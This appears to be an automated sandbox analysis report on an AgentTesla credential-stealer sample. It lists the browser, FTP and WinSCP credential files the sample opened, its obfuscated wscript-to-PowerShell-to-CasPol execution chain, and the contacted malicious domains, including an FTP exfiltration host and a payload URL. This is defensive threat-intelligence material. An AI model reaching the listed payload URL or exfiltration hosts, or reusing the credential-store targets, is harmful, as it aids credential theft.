Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8124, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000008.00000002.10144559391.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8124, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_00EE4A7A bind, 8_2_00EE4A7A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 8_2_00EE4A55 bind, 8_2_00EE4A55
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 760647 Sample: Packing list  ASPL22-23-150... Startdate: 05/12/2022 Architecture: WINDOWS Score: 100 23 ftp.mcmprint.net 2->23 25 fumiduer.tk 2->25 27 2 other IPs or domains 2->27 35 Snort IDS alert for network traffic 2->35 37 Multi AV Scanner detection for domain / URL 2->37 39 Yara detected AgentTesla 2->39 41 3 other signatures 2->41 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 51 Wscript starts Powershell (via cmd or directly) 9->51 53 Obfuscated command line found 9->53 55 Very long command line found 9->55 12 powershell.exe 7 9->12         started        process6 signatures7 57 Very long command line found 12->57 15 powershell.exe 12->15         started        17 conhost.exe 12->17         started        process8 process9 19 CasPol.exe 15 12 15->19         started        dnsIp10 29 ftp.mcmprint.net 185.31.121.136, 21, 49837, 49838 RAX-ASBG Bulgaria 19->29 31 fumiduer.tk 103.83.194.50, 49834, 80 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN United States 19->31 33 api.ipify.org.herokudns.com 3.220.57.224, 443, 49836 AMAZON-AESUS United States 19->33 43 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->43 45 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->45 47 Tries to steal Mail credentials (via file / registry access) 19->47 49 4 other signatures 19->49 signatures11
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.83.194.50
 fumiduer.tk United States
132335 NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN false
3.220.57.224
 api.ipify.org.herokudns.com United States
14618 AMAZON-AESUS false
185.31.121.136
 ftp.mcmprint.net Bulgaria
199364 RAX-ASBG true

Contacted Domains

Name IP Active
fumiduer.tk 103.83.194.50 true
api.ipify.org.herokudns.com 3.220.57.224 true
ftp.mcmprint.net 185.31.121.136 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://fumiduer.tk/fonts/qQdCidiSDbbqpK88.deploy false
    • Avira URL Cloud: safe
    		 unknown